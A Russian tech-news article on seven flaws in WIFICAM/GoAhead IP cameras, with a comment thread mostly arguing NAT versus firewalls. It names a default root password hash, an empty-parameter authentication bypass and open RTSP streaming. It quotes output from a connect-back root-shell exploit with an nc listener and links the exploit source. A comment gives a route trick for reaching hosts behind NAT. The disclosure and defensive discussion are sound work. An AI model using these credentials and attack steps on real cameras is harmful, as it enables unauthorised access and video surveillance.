В свете событий последних месяцев, со взломом IoT-гаджетов и формирования из них ботнетов, безопасность подключенных к сети девайсов, казалось бы, должна ставиться производителями «железа» во главу угла. Но на самом деле, это не совсем так. Анализ, проведенный специалистами по информационной безопасности, включая Пьера Кима (Pierre Kim), показывает, что большое количество моделей беспроводных камер самых разных производителей до сих пор подвержено взлому. Речь идет о 1250 различных моделях камер, это около 200 000 устройств.

Уязвимость, о которой идет речь, затрагивает систему с названием Wireless IP Camera (P2P) WIFICAM. Ее разработчик — китайская компания, которая продает свой базовый девайс нескольким производителям видеокамер.

Проблем в этой «базе» не одна и не две. Специалисты по кибербезопасности насчитали сразу семь «дыр». Складывается впечатление, что китайцы вообще не думают о защите своего устройства. Возможно, это не просто впечатление.

Центральный элемент большинства проблемных мест с защитой — веб-сервер GoAhead. Он позволяет владельцам камер управлять своими устройствами через веб, используя фирменную панель управления. Создатель GoAhead — компания Embedthis Software. Изначально Ким считал именно ее ответственной за появление столь масштабной проблемы. Но руководство Embedthis Software утверждает, что и основу веб-сервера предоставляет разработчик Wireless IP Camera (P2P) WIFICAM. Сотрудники компании, которая поставляет Wireless IP Camera (P2P) WIFICAM, пишут код, который затем добавляется в прошивку камеры.

Что касается дыр в защите камер, то их, возможно, даже больше семи. Основные же такие:

Вход для всех желающих. Telnet работает по умолчанию, и любой человек может подключиться к удаленному устройству, используя такие данные: root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh

Возможность перехватить данные зарегистрированных пользователей. Злоумышленник при желании может обойти систему аутентификации, указав пустые значения для параметров «loginuse» и «loginpas» при доступе к конфигурационным данным сервера. Это позволяет злоумышленнику получить файлы с данными зарегистрированных пользователей, включая доступы к их FTP и SMTP аккаунтам.

Получение root-прав. Злоумышленник может обойти процедуру аутентификации, запустив команду с правами суперпользователя. Для этого необходимо просто использовать URL со специальными параметрами.

Стриминг без аутентификации. И такая возможность здесь присутствует. Эту уязвимость можно использовать благодаря наличию встроенного RTSP сервера с портом 10554. В результате посторонний может получить доступ к потоковому видео без необходимости логиниться.

user@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl 192.168.1.107                               
Camera 0day root RCE with connect-back @PierreKimSec

Please run `nc -vlp 1337` on 192.168.1.1

[+] bypassing auth ... done
    login = admin
    pass  = admin
[+] planting payload ... done
[+] executing payload ... done
[+] cleaning payload ... done
[+] cleaning payload ... done
[+] enjoy your root shell on 192.168.1.1:1337
user@kali$

Доступ к облаку. Камера дает возможность управлять устройством через интернет. Для этого используется UDP-туннель, что позволяет обходить NAT и файерволы. Злоумышленник может эксплуатировать эту функцию в своих интересах для того, чтобы запустить брут-форс атаку, стремясь получить данные доступа к девайсу. Кроме камер, по словам специалистов, тот же принцип удаленного доступа использует более 1 млн иных IoT устройств.

Поисковик Shodan показывает около 200 000 уязвимых устройств, если использовать запрос определенного типа.


Скриншот с камеры, принадлежащей самому специалисту

С каждым днем число уязвимых устройств увеличивается. Специалисты по информационной безопасности рекомендуют отключить камеры от интернета и проверить, не является ли модель такого устройства открытой для взлома. Все модели проблемных камер перечислены в посте Кима.

Уязвимости такого рода характерны не только для вебкамер, но и для цифровых приставок, систем безопасности и других IoT-девайсов. Злоумышленники, зная о проблемах с безопасностью устройств, разрабатывают эксплоиты, которые позволяют создавать ботнеты из взломанных девайсов. Например, в прошлом году червь и ботнет Mirai атаковал сотни тысяч уязвимых гаджетов. В основном, это удается сделать в отношении тех устройств, владельцы которых не сменили данные учетных записей. Созданный ботнет позволил организовать несколько мощных DDoS-атак, противостоять которым оказалось практически невозможным.

Первыми жертвами этого ботнета стали специалист по информационной безопасности и журналист Брайан Кребс, а также французский хостинг-провайдер OVN и компания Dyn. Атака на последнюю компанию стала причиной того, что тысячи пользователей остались без доступа к таким сервисам, как Twitter, Amazon, Tumblr, Reddit, Spotify и Netflix.
Поделиться с друзьями
-->

Комментарии (139)


  1. stDistarik
    12.03.2017 01:16
    +3

    Спасибо за статью.
    Однако Вы забыли выложить исходник для этого:

    gcc -Wall -o expl expl-goahead-camera.c
    


    1. SLY_G
      12.03.2017 11:38
      -8

      Первая ссылка в гугле


      1. AVX
        12.03.2017 22:43
        +2

        За что минусим, товарищи? Обленились совсем?
        Первая ссылка в гугле (понимаю, что у каждого он свой немного, но у меня так) показывает статью, а в статье прямая ссылка на файл https://pierrekim.github.io/advisories/ expl-goahead-camera.c


  1. lrsi
    12.03.2017 02:46
    +2

    Одно расстраивает — сейчас к сожалению большинство таких устройств находятся за NAT и посему — достаточно труднодоступны. Но когда IPv6 наконец-то победит — все эти устройства получат реальные IP и вот тогда-то начнется настоящее веселье…


    1. qw1
      12.03.2017 09:26

      Сейчас провайдер выдаёт каждому клиенту подсеть /64. А роутеры выдают адреса клиентам, используя рандомизацию (маловероятно, что кто-то руками настраивает статические адреса).

      И вместо статей по обходу NAT, будут статьи по «быстрому» сканированию подсети /64 или по угадыванию выхода генератора псевдослучайных чисел.


      1. sintech
        12.03.2017 09:50
        +2

        Роутеры не выдают непосредственно адреса если настроены в stateless режиме, а только анонсируют старшие 64 бита адреса в lan сегмент. А дальше уже от клиента зависит как он сгенерирует свой адрес: windows сделает рандомизацию, а большинство линуксов в т.ч. embedded соберут адрес из мака сетевого интерфейса по методу eui64.
        Если же роутер в стейтфул режиме (dhcpv6) то как правило конфигурируется пул адресов с ::1 по ::1000 также как и в ipv4.
        Я хочу сказать, что просто смена версии ip протокола не увеличит безопасность устройств. Потребитель умных девайсов должен сам заботится о своей безопасности, хотябы установив statefull firewall перед девайсами у себя дома.


        1. qw1
          12.03.2017 10:17

          Понятно. Т.е. пространство перебора сужается до количества произведённых устройств (узнаём mac-префиксы интересующих вендоров, узнаём по каждому, сколько mac-ов уже выдано в суффиксе 224). Всё равно, сканирование нужно намного большее, чем для сетей ipv4.


        1. J_o_k_e_R
          12.03.2017 22:02

          А дальше уже от клиента зависит как он сгенерирует свой адрес: windows сделает рандомизацию, а большинство линуксов в т.ч. embedded соберут адрес из мака сетевого интерфейса по методу eui64.


          Не делает рандомизацию, а использует privacy extensions (rfc4941) и не «windows делает, а линукс не делает», а так как включено в ОС\Network Manager по умолчанию.


    1. Hellsy22
      12.03.2017 13:30

      Абсолютное большинство роутеров блокируют внешние соединения.


      1. lrsi
        12.03.2017 13:42

        Первый совет ЛЮБОЙ техподдержки, в ЛЮБОЙ ситуации — «отключите антивирус и фаервол». 95% ему следуют и забывают включить обратно как минимум фаервол.
        Вся проблема фаервола, в том что его можно отключить и все будет работать. С NAT такое не проходит. :)


        1. rkfg
          12.03.2017 17:17

          Фаерволл отключают на компьютере, при чём тут роутер? Для IPv6 действительно блокируется входящий трафик, ну и NAT никогда нельзя считать аналогом защиты, про это писалось многократно. Недоступность извне — это лишь небольшой побочный и не слишком надёжный эффект.


          1. lrsi
            12.03.2017 19:23

            NAT выполняет некоторые базовые функции защиты, конкретно — не дает возможности устанавливать входящие соединения на компьютеры в сети.
            Кстати, немного офтопика — Cisco ASA устройство защиты сети? Однозначно! Вспомните на каких принципах оно функционирует…
            Это «небольшой побочный и не слишком надежный эффект» одним махом отсекает кучу векторов атаки. Чтоб далеко не ходить — большинство атак, обсуждаемых в данной статье, работают только если камера имеет внешний IP или сеть уже скомпроментирована — злоумышленник имеет доступ внутрь нее.

            Фаерволл отключают на компьютере, при чём тут роутер?

            Я хочу вас разочаровать — на роутерах тоже. Простой юзер давно запомнил — фаервол это такая ненужная вещь, которая мешает ему пользовать торренты и сетевые игры и постоянно задает какие-то глупые (то есть — непонятные) вопросы. И это первое что надо отключить. :) И ВСЕ службы техподдержки, любого продукта — настойчиво укрепляют его в этом заблуждении. Если хочешь чтоб ничего не работало — включи фаервол!
            И хоть каких-то подвижек, чтоб переломить эту ситуацию — нет и не предвидется. Фаерволы — слишком «тупые», их надо тщательно настраивать чтоб от них была польза. Что простого юзера категорически не устраивает.
            Фаервол — слишком низкоуровневая штука для обычного юзверя, требует слишком много знаний для своей грамотной настройки. Которых у рядового юзверя нет и никогда не будет. Тут скорей больше пользы от IDS/IPS — их хотя бы в теории можно преднастроить так чтоб они были не менее гиморойны в использовании для обычного юзверя чем антивирус.


            1. J_o_k_e_R
              12.03.2017 22:04

              NAT выполняет некоторые базовые функции защиты, конкретно — не дает возможности устанавливать входящие соединения на компьютеры в сети.


              Это не так. Сам NAT никак не препятствует установлению соединений с компьютерами внутри сети. За это отвечает как раз и только фаервол.


              1. Hellsy22
                12.03.2017 22:42

                NAT препятствует самой своей сутью — внешние соединения устанавливаются с определенным портом роутера, который сам роутер перенаправляет на внутренний адрес/порт. В этом смысле NAT блокирует все внешние соединения — инициатором всегда должн выступать узел внутренней сети.


                1. J_o_k_e_R
                  12.03.2017 22:47

                  Нет, не препятствует. Зная адресацию внутренней подсети, злоумышленик может указать WAN адрес роутера как шлюз для этих внутренних адресов и благополучно будет к ним обращаться, если не настроен фаервол.

                  Да, конечно, злоумышленик должен быть в той же сети, что и WAN-порт роутера, но сути это не меняет, NAT ничему не препятствует сам по себе. Это не его задача.


                  1. Hellsy22
                    12.03.2017 22:57
                    -1

                    благополучно будет к ним обращаться

                    Reverse Path Filter


                    1. J_o_k_e_R
                      12.03.2017 23:01

                      Ну то есть Вы тоже пришли к пониманию, что NAT сам по себе ничему не препятствует и нужны дополнительные средства фильтрации. ЧТД.


                      1. Hellsy22
                        12.03.2017 23:15
                        -1

                        NAT не препятствует, он не обеспечивает возможности форвардить внешнее соединение, а по умолчанию эта возможность заблокирована с помощью Reverse Path Filter, поэтому дополнительный фаервол при наличии NAT не является необходимым.

                        Мне это разжевать еще подробнее или вы будете продолжать выделываться в стиле «дверь сама по себе ничему не препятствует, нужны стены»?


                        1. J_o_k_e_R
                          12.03.2017 23:23
                          +1

                          Разжуйте, будьте любезны уж. Особенно как reverse filter будет фильтровать IP в случае ситуации, описанной мною. Объясню на пальцах:
                          Ваш роутер имеет два порта: wan и lan. на wan ip, предположим, 7.7.7.100/24, на LAN 192.168.0.1/24. Фаервола нет, есть rp filter и NAT 192.168.0.0/24->7.7.7.100.

                          Злоумыленик в той же локалке, что и WAN порт роутера. У злоумышленика один интерфейс с адресом 7.7.7.200/24. Злоумышленик прописывает у себя
                          ip route add 192.168.0.0/24 via 7.7.7.100. После чего обращается на 192.168.0.2.
                          Будьте любезны разжевать, что именно воспрепятствует нашему роутеру заблокировать пакеты межу 7.7.7.200 и 192.168.0.2?

                          Для справки rp filter фильрует только пакеты, у которых адрес отправителя не соотвествует сети на порту. В нашем случаее это условие нигде не нарушается.

                          И не хамите. Недостаток знаний сам по себе проблемой не является, а вот Ваше упорство при недостатке знаний очень даже.


                          1. Hellsy22
                            13.03.2017 00:19
                            -1

                            Для ситуации, когда компьютер злоумышленника находится в той же самой подсети, что и роутер жертвы, а соединения между узлами сети не запрещены — да, можно попытаться прописать gateway. Редкая вырожденная ситуация, которую вероятно можно встретить в каких-нибудь студенческих общежитиях с самопальной сетью.

                            И не хамите.

                            … и дальше очередное хамское предложение с переходом на личности в ключе рассказа «Срезал».

                            Всего хорошего.


                            1. lrsi
                              13.03.2017 10:24
                              -2

                              Забейте — наш опонент очевидно что линаксоид. А у этой публики очень специфичные и в корне неверные представления о сетях…


                              1. J_o_k_e_R
                                13.03.2017 13:32

                                Задачка «нужно ли настраивать FORWARD фаерволла, если есть NAT?» задачка из «курсов начинающих сетевиков» различных вендоров. И только недотеоретики спорят с моим вариантом ответа. Ибо NAT by design не фильтрующее средство, а как раз средство обеспечения связности.


                                1. lrsi
                                  13.03.2017 15:38
                                  -1

                                  Возmмем классическое устройство обеспечения безопасности сетей — Cisco ASA… Ну ты понял, линаксоид, да? :)


                                  1. J_o_k_e_R
                                    13.03.2017 19:59

                                    Нет, не понял. Что в асе\циско вообще не соотвествует тому, что я написал?


                                    1. lrsi
                                      13.03.2017 23:36
                                      -1

                                      Cisco ASA — один сплошной NAT. Я не скажу что там больше ничего нет в принципе, ибо это не так, но вся защитам там базируется на NAT, там это — базовая технология, вокруг которой все строится. :)


                                      1. J_o_k_e_R
                                        13.03.2017 23:43

                                        Промахнулись комментом. Я ниже задал вопросы по существу.


                                  1. J_o_k_e_R
                                    13.03.2017 20:14

                                    Я уточню свой вопрос, а то Вам с Вашей кармой, вызванной вероятно, манерой изъясняться, комментарии редко доступны.
                                    То, что циска назвала фаервол access list никак не меняет его сути. Вам и в циске необходимо кроме непосредственно трансляции адресов (NAT, указания подсети из которой транслировать и IP\подсети, в которую транслировать) указывать отдельно какой откуда траф пропускать или нет. И, даже, если я ошибаюсь (сужу по их официальной документации ). У меня два вопроса:
                                    1) При чем тут вообще ASA\Cisco? Мы разговариваем про NAT вообще, а не его исполнение у конкретного, в случае SOHO (про что данная статья), крайне редкого вендора.
                                    2) Покажите мне в RFC про NAT (3022 или аналогичное) хоть какие-то слова про фильтрацию? Их нет. Ибо NAT — это трансляция адресов, но никак не фильтрация.


                                    1. lrsi
                                      14.03.2017 00:52

                                      Для начала пожалуйста запомните — access list это НЕ firewall!!!!!!!!!!!! Уж простите, но за такие фразу возникает желание УБИВАТ!!! :)
                                      Не разумеется топором можно забивать гвозди, но это не повод называть его молотком.
                                      Если вам реально интересно — можем поговорить об access list в Cisco в другом, более удобном месте. Это средство управления потоками данных, а не фаервол. Чтоб понять отличие — посмотрите как описывается тот же NAT в Cisco. А заодно — route map, ipsec и т.д. — везде невозможно обойтись без access list-ов, которыми ты разделяешь трафик, требующих некоторых действий и трафик, который этим действиям подвергаться не должен.

                                      При чем тут вообще ASA\Cisco? Мы разговариваем про NAT вообще

                                      При том что Cisco ASA — очень прикольное и специфическое устройство, его еще называю NAT device ибо там все строится вокруг NAT — куда не ткнешься, упрешься в NAT. Он имеет функции маршрутизатора, но полноценным маршрутизатором не является, к слову так. Вообщем если говоришь о NAT то обойти устройство, где NAT возведен в абсолют, является базовой технологий, где она получила наибольшее развитие — не получится имхо.
                                      Покажите мне в RFC про NAT (3022 или аналогичное) хоть какие-то слова про фильтрацию? Их нет. Ибо NAT — это трансляция адресов, но никак не фильтрация.

                                      А кто сказал что полноценный firewall это обязательно фильтрация? Cisco ASA — классический пример реализации фаервола, основанного на трансляции. :) Нет трансляции — нет коннекта. Есть трансляция — возможно коннект и будет, если остальные условия позволяют. Ну разумеется не коннекта, а прохождение пакета… но это не принципиально.
                                      Именно возня с Cisco ASA дает осознание того факта что этим топором (NAT который) можно не только дрова рубить (раздавать интернеты на приватные адреса), но и целые Кижи построить (ту же сеть для сертификации по PCI DSS). :)

                                      Для полного запутывания ситуации — в Cisco ISR фаервол, тот который ZBFW, основан на фильтрации, ога. Но он считается менее надежным и сеть, защищенную им, на тот же PCI DSS никогда не специфицируют. :)


                                      1. J_o_k_e_R
                                        14.03.2017 11:11

                                        Спасибо, познавательно. В любом случае реализация NAT у отдельного вендора в контексте данной статьи представляет интерес сугубо теоретический. Большинство устройств (а я таки смею заявлять, что для обеспечения безопасности камер, о которой ведется речь в статье, в большинстве случаев будут использоваться linux-based решения) реализуют NAT согласно RFC и следовательно никакой фильтрации не обеспечивают.


                                        1. lrsi
                                          14.03.2017 11:37

                                          а я таки смею заявлять, что для обеспечения безопасности камер, о которой ведется речь в статье, в большинстве случаев будут использоваться linux-based решения

                                          Так, вы присядьте пожалуйста… Сели? Крепко сидите? Шок будет сильным, но вы там держитесь...:) Так вот, Cisco ASA это linux-based решение! У нее унутри неонка, линакс! Это же по сути старый добрый PIX, который х86+линакс. :) Именно поэтому истинные кошководы недолюбливают Cisco ASA — там стоит неполноценная ОС. :) Но с другой стороны полноценное RT в этой железке и не нужно. Но неприятно что его нет.
                                          И она «реализует NAT согласно RFC» — просто надо внимательно читать RFC. :) Hint — в RFC нигде не говориться что один из транслируемых адресов обязательно должен быть приватным. :) Как только приходит понимание этого простого факта — взгляды на NAT кардинально меняются :)
                                          Я скачу более — для обеспечения безопасности NAT предпочтительней классической фильтрации. Дело в том что как не крути, но фильтрация по умолчанию подразумевает прохождение пакета. Да разумеется все фаерволы на фильтрации имеют конфигурацию в стили deny any any, но… это именно конфигурация — отключи фильтрацию и сеть станет открытой. NAT же по умолчанию подразумевает непрохождение пакета, нету трансляции — нету пакета. Отключи NAT и сеть окажется полностью блокированной. И кстати сделать глупость в стиле прописывания allov any any в них гораздо сложней. :) Именно поэтому все серьезные фаерволы строятся на основе NAT.


                                          1. J_o_k_e_R
                                            14.03.2017 11:41

                                            Вы почитайте что я пишу в соседних комментах. Мы с товарищами разобрали мой пример «обхода» NAT, так вот, он как раз работает, потому, что NAT для соединения извне не используется. Именно поэтому фильтрация как таковая, помимо трансляции необходима, будь фильтрация встроена в NAT, как в cisco или нет, как в netfilter в линуксе.


                                            1. lrsi
                                              14.03.2017 13:07

                                              NAT для соединения извне не используется

                                              Вы путаете две вещи — полноценную реализацию NAT и крайне кастрированную версию стандартной реализации оного в линаксе. Кратко — NAT используется ВСЕГДА — http://www.cisco.com/c/en/us/support/docs/ip/network-address-translation-nat/6209-5.html И это — не ASA, а обычный роутер. ASA все еще жестче — либо через NAT, либо никак, просто нет иных механизмов прохождения пакета.


                                              1. ValdikSS
                                                14.03.2017 13:38
                                                +1

                                                Действительно ли это нат, либо же это отслеживание состояния соединений (connection tracking, stateful firewall)? Не имел дел с оборудованием Cisco, но звучит странно. Т.е. это устройство не умеет просто маршрутизировать пакеты, обязательно подвергает их трансляции?


                                              1. J_o_k_e_R
                                                14.03.2017 13:51

                                                Опять же. Учитывая контекст в частности и распространенность линуксов вообще, а так же описание NAT в RFC — это вы путаете что такое NAT в общем и его конкретную реализацию у конкретного вендора (cisco). Тем более то, что в линуксе он «кастрированный» — это только ваше частное мнение. Мне вот кажется, что это в cisco (если конечно верить вашим словам о том, как это там устроено) совершенно зря вместе наворотили то, что наворачивать вместе не надо было. И то как работает conntrack мне нравится намного больше, чем то, что вы описываете в cisco.


                                                1. lrsi
                                                  15.03.2017 12:49
                                                  -1

                                                  Учитывая контекст в частности и распространенность линуксов вообще

                                                  ~2/3 активного сетевого оборудования интернета — произведено Cisco. Так что вопрос о распространенности можно считать закрытым — есть IP-сети в понимании Cisco и прочие неверные представления об IP-сетях. :)
                                                  Немного оффтопика
                                                  Cisco удалось создать уникальную систему сертификации и обучения. Оно не учит работе с оборудованием Cisco — оно учит работе с IP-сетями. Это такой вендор-лок, который им удалось вывести на принципиально иной уровень — ты либо работаешь с сетью так, как считает правильным Cisco, либо… ты не можешь работать с сетью. И абсолютно неважно твое мнение — есть сетевой инженер с сертификатом Cisco и других сетевых инженеров — просто нет. Даже если ты не работаешь с оборудованием Cisco — ты обязан иметь сертификацию Cisco, чтоб тебя называли сетевым инженером. :)


                                                  1. J_o_k_e_R
                                                    15.03.2017 13:31

                                                    А я думал это сказки про напыщенных кошководов-сказочников, про которые не раз слышал на курсах сетевиков (как общих, так и других вендоров) (не стал изучать циско, ибо считаю совершенно гипертрофированно высоким соотношение цены и качества; а пообщавшись с Вами и почитав, благодаря Вам, документацию циски, еще и понял, что оно достатчно криво). А нет, вы действительно существуете. Я думаю дальнейшая дискуссия с вами бесполезна, поэтому я из нее ухожу.

                                                    Одно прошу, не рассказывайте таки вне сообщества кошководов про NAT, который можно без фаервола. Люди, которые имели наглость не использовать циску, потом могут вас послушать и настроить NAT без фаервола, оставив доступ во внутренюю сеть.


                                                    1. lrsi
                                                      15.03.2017 13:54
                                                      -1

                                                      не стал изучать циско

                                                      То есть — вы не являетесь сетевым инженером и не понимаете как строить IP-сети. :) Так рекомендую — послушайте тех, кто разбирается в IP-сетях. :)
                                                      Одно прошу, не рассказывайте таки вне сообщества кошководов про NAT, который можно без фаервола.


                                                      Вы так ничего и не услышали. А все потому что вы не понимаете что такое NAT и смотрите на него с позиций, основанных на знании убогой и кастрированной реализации оного в линаксе.
                                                      Кратко — NAT для ограничения доступа сети надежней фаервола. Потому что если отключить фаервол (например в результате атаки) — сеть станет полностью открытой и доступной, если отключить NAT — сеть станет полностью недоступной. :) Кроме того что он более надежен — он требует меньше ресурсов, а следовательно — в разы устойчив к атакам типа DDoS.
                                                      Хотя и это не совсем корректно — современный фаервол это NAT :)
                                                      А фильтрация… ну классическая — по протоколу/порту, в современных фаерволах не применяется — это функции возлагаются на трансляцию, как менее ресурсоемкую и более надежную. Фильтрация осуществляется только на основе данных DPI, но это уже ближе к IDS/IPS чем к классическим фаерволам. :) Хотя опять же — классические фаерволы (в понимании линаксоида) в местах где нужна серьезная защита давно не используются, ибо устаревшая, ресурсоемкая и ненадежная технология.


                                                      1. qw1
                                                        16.03.2017 00:18
                                                        +1

                                                        Вы этот ASA с NAT-ом преподносите, как средство для всех сетевых решений (сравнивая его с линусками и микротиками).

                                                        Но всему своё место. Глупо ставить специализированный firewall Cisco ASA у себя дома для раздачи WiFi на 2 планшета и ноут. Также глупо ставить его аплинком в сети провайдера, куда ставят Mikrotik Cloud Core или Cisco Catalyst, где NAT ASA просто захлебнётся от потока (что ни говори, обычный stateless роутинг производительнее, чем NAT, потому что не требует отслеживания каждого соединения). Тут аргумент насчёт DDoS выглядит неубедительно.


                                                        1. lrsi
                                                          16.03.2017 00:42
                                                          -1

                                                          facepalm.jpg
                                                          Смешались в кучу кони, люди…
                                                          Ты и коммутаторы, и фаерволы, и какие-то сохо-железки, тот же микротык…
                                                          Опять же Cisco ASA я привожу только как пример девайса для защиты сети, реализация которого основывается на NAT, не более того. В пику глупым утверждением что NAT не обеспечивает защиты — только фаервол. Вот вам — обеспечивает. И получше чем iptables — классический пример негодной реализации фаервола имхо. :)

                                                          Все бредовые утверждения «NAT не обеспечивает защиты» основаны на одном-единственном недоразумении — автоматическое создание трансляций. Ну да, наверно это механизм можно как-то надурить — автоматы они глупые. Но пока что все примеры такого обдуривания основаны на весьма специфических условиях, достижимых в лаборатории, но не встречающихся в реальной жизни.
                                                          И самое главное — отключите этот механизм, нигде не сказано что он — неотъемлемая часть NAT, и получите прекрасный, очень малоресурсуемкий и надежный механизм защиты сети — NAT. :)
                                                          Что в линаксе не получается? Ну так это проблема реализации в одной ОС, занимающей ~1% рынка — то же мне проблема. :)


                                                          1. qw1
                                                            16.03.2017 14:46
                                                            +1

                                                            Не понял про автоматическое создание.

                                                            В линуксах есть правила. Например, создавай трансляцию, если пакет из локальной сети с такого-то IP (или подсети) передаётся в WAN на такую-то подсеть (или на любой адрес).

                                                            В цисках не так? Там каждую трансляцию вручную надо прописывать?
                                                            — Товарищь майор, можно мне в Гугл?
                                                            — Да, можно, но только один tcp-коннект. Твой внешний адрес будет 7.7.7.100, исходящий порт 22001. Выполнять!


                                                            1. lrsi
                                                              16.03.2017 15:50
                                                              -1

                                                              Не совсем. Для начала осознай что это средство защиты сети, а не хоста. Теперь представь себе что единственный вариант прохождения пакетов между интерфейсами устройства защиты сети — через NAT, остальные — отключены. И теперь забуть про трансляцию приватных адресов в реальные, не важно — реальные в реальные тоже транслируются. :)
                                                              Начинаешь осознавать как это работает? :)


                                                              1. qw1
                                                                16.03.2017 17:47
                                                                +1

                                                                Теперь представь себе что единственный вариант прохождения пакетов между интерфейсами устройства защиты сети — через NAT, остальные — отключены.
                                                                Внезапно, отключаем роутинг на линуксах/микротиках и получаем Cisco ASA?

                                                                Пока это всё выглядит как выкачивание бабла. В этой железке отрубим роутинг, назовём её сетевым экраном. А в другой железке отрубим NAT, назовём её роутером.


                                                                1. lrsi
                                                                  16.03.2017 17:49
                                                                  -2

                                                                  Внезапно, вы вообще в курсе что такое роутинг? Собственно железка может исполнять роль роутера и при этом — не использовать роутинг для маршрутизации пакетов между своими интерфейсами.


                                                                  1. qw1
                                                                    16.03.2017 23:48
                                                                    +1

                                                                    Вы меня троллите? Роутинг — передача пакета между интерфейсами устройства без изменения пакета (в отличие от NAT) по определённым правилам, которые могут задаваться либо маршутами, либо ещё как-то.

                                                                    Не считая изменения системных полей пакета, типа TTL.


                                                                    1. lrsi
                                                                      17.03.2017 00:37
                                                                      -1

                                                                      Роутинг — передача пакета между интерфейсами устройства без изменения пакета (в отличие от NAT) по определённым правилам, которые могут задаваться либо маршутами, либо ещё как-то.

                                                                      facepalm.jpg
                                                                      А ведь я так и знал. :) Даже не знаю и с чего начать, но кратко — ваше определение роутинга в корне не верно. Чтоб это понять ответьте на простой вопрос — что делают все протоголы роутинга, не важно какой — RIP. OSPF, BGP. Какое их назначение? :)


                                                                      1. qw1
                                                                        17.03.2017 09:02
                                                                        +1

                                                                        У вас зашоренность, а не facepalm. Я вам объясняю, что такое роутинг в самом общем виде, а вы всей картины не видите, упёрлись в алгоритмы для обеспечения роутинга в частных случаях.

                                                                        Ведь роутинг можно сделать на статических маршрутах, без BGP, OSPF. От этого он не перестанет быть роутингом.


                                                                        1. J_o_k_e_R
                                                                          17.03.2017 10:22
                                                                          +1

                                                                          Вы там держитесь. У Вас на другом конце провода оппонент, который видит мир через призму решений одного вендора. Решения эти он возводит в абсолют и считает правильными (Cisco диктует в RFC, а не RFC в Cisco). В общем гремучая смесь недалекого фанатика с зачатками тролля. Дискуссия бессмысленна.


                                                                          1. lrsi
                                                                            17.03.2017 15:38
                                                                            -1

                                                                            Cisco диктует в RFC, а не RFC в Cisco

                                                                            Посмотрите кто пишет RFC… Это будет внезапно, ога. :)

                                                                            google://cisco site:https://tools.ietf.org дает примерно 26 000 вхождений.
                                                                            google://lucent site:https://tools.ietf.org дает примерно 22 500 вхождений.
                                                                            google://juniper site:https://tools.ietf.org дает примерно 29 400 вхождений.
                                                                            google://linux site:https://tools.ietf.org дает примерно 3 670 вхождений.
                                                                            google://microsoft site:https://tools.ietf.org дает примерно 8 090 вхождений.

                                                                            Это все что надо знать о значимости линакса в области стандартизации интеренетов. :)


                                                                        1. lrsi
                                                                          17.03.2017 13:22
                                                                          -1

                                                                          Понятно. Видим мир сквозь того как это реализовано в одной ОС с распространенностью ~ 1%
                                                                          Придется начать с определения…

                                                                          Маршрутизация (англ. Routing) — процесс определения маршрута следования информации в сетях связи.

                                                                          В сетях, а не в устройстве!!! По определению!
                                                                          Более того, я раскрою вам небольшой секрет — передачей пакетов между интерфейсами во всех сетевых устройствах, всех вендоров — это отдельный, коммутационный процесс, forwarding или switching (для L3 Switch).
                                                                          От этого и танцуйте — от сети, а не от того что происходит внутри устройства. Когда научите так мыслить — можете начинать изучать сетевые протоколы.


                                                                          1. qw1
                                                                            17.03.2017 17:22
                                                                            +1

                                                                            Ага, отлично. Если вы в этом смысле, то это у вас

                                                                            Смешались в кучу кони, люди…

                                                                            потому что здесь
                                                                            отключите этот механизм, нигде не сказано что он — неотъемлемая часть NAT
                                                                            вы что подразумеваете — не на устройстве отключить, а во всей сети глобально? ))) Вы так умеете?


                                                                            1. lrsi
                                                                              17.03.2017 17:39
                                                                              -1

                                                                              вы что подразумеваете — не на устройстве отключить, а во всей сети глобально?

                                                                              Прекратите принимать анонсы сетей — и это будет равнозначно отключению роутинга. По крайней мере это устройство перестанет видеть что в сети существует какой-то роутинг. :)


                                                                            1. lrsi
                                                                              17.03.2017 18:53
                                                                              -1

                                                                              А блин… Последняя попытка объяснить — вы в корне неправильно думаете для сетевого инженера. :) Вы рассматриваете что происходит в отдельном устройстве, а это — абсолютно не важно. Надо думать о том что происходит в масштабах сети. Вот когда научитесь думать в масштабах сети — тогда поймете о чем вам говорит сетевой инженер. :)


                                                                              1. qw1
                                                                                17.03.2017 19:35
                                                                                +1

                                                                                Для решения моих задач мне не нужно быть сетевым инженером, или думать за весь интернет. Я конфигурирую конкретное устройство (устройства), и это необходимый набор действий для решения задачи. Витая в облаках, не снисходя до железок, ничего не настроишь.


                                                                                1. lrsi
                                                                                  17.03.2017 19:53
                                                                                  -1

                                                                                  Первична — сеть и соответственно — процессы, происходящие в сети. Без их понимания — конкретную железку корректно настроить не получится. Именно потому что она существует не сама по себе, а как часть сети.
                                                                                  Когда попытаетесь управлять хотя бы небольшой сетью, хотя бы — с несколькими десятками маршрутизаторов — поймете о чем я.


                                                                                  1. qw1
                                                                                    17.03.2017 20:59
                                                                                    +1

                                                                                    Конкретно для сабжевой задачи важнее знать не «теорию», типа «NAT — самое лучшее решение в области сетевой безопасности», а практику — «в mikrotik разрешены входящие соединения за NAT, которые инициируются из подсети внешнего интерфейса»


                                                                                    1. lrsi
                                                                                      17.03.2017 21:57
                                                                                      -1

                                                                                      То есть из за уязвимости одного малозначительного и малораспостраненого вендора ( google://mikrotik site:https://tools.ietf.org — аж 26 упоминаний) вы делаете общий вывод «NAT не является средством защиты сети»?
                                                                                      И после этого эти люди говорят о том что у меня — жесткий вендор лок… Ну да, конечно же! :)


                                                                                      1. qw1
                                                                                        17.03.2017 23:49
                                                                                        +1

                                                                                        Какой уязвимости? Если вы не понимаете, что происходит, то изучать надо, а не лепить вердикты.


                                                                                        1. lrsi
                                                                                          18.03.2017 00:09
                                                                                          -1

                                                                                          Какой уязвимости?

                                                                                          Логические. Из-за неверной/неполной реализации протоколов.


                                                                                          1. qw1
                                                                                            18.03.2017 00:38
                                                                                            +1

                                                                                            В линуксах всё верно и полно. Кастрированное устройство — это Cisco ASA, если оно в роутинг не может.


                                                                                            1. lrsi
                                                                                              18.03.2017 01:20
                                                                                              -1

                                                                                              Ну да, конечно же! :)

                                                                                              Полная… в рамках убогого понимания протоколов линаксоидами… До сих пор не забуду спор с одним «kernel hackers», который утверждал что «размер пакета TCP/IP (sic!!!) не может превышать 1500 байт» И эти люди реализуют сетевую подсистему линакса… Верно и полно… Ну да, конечно же!

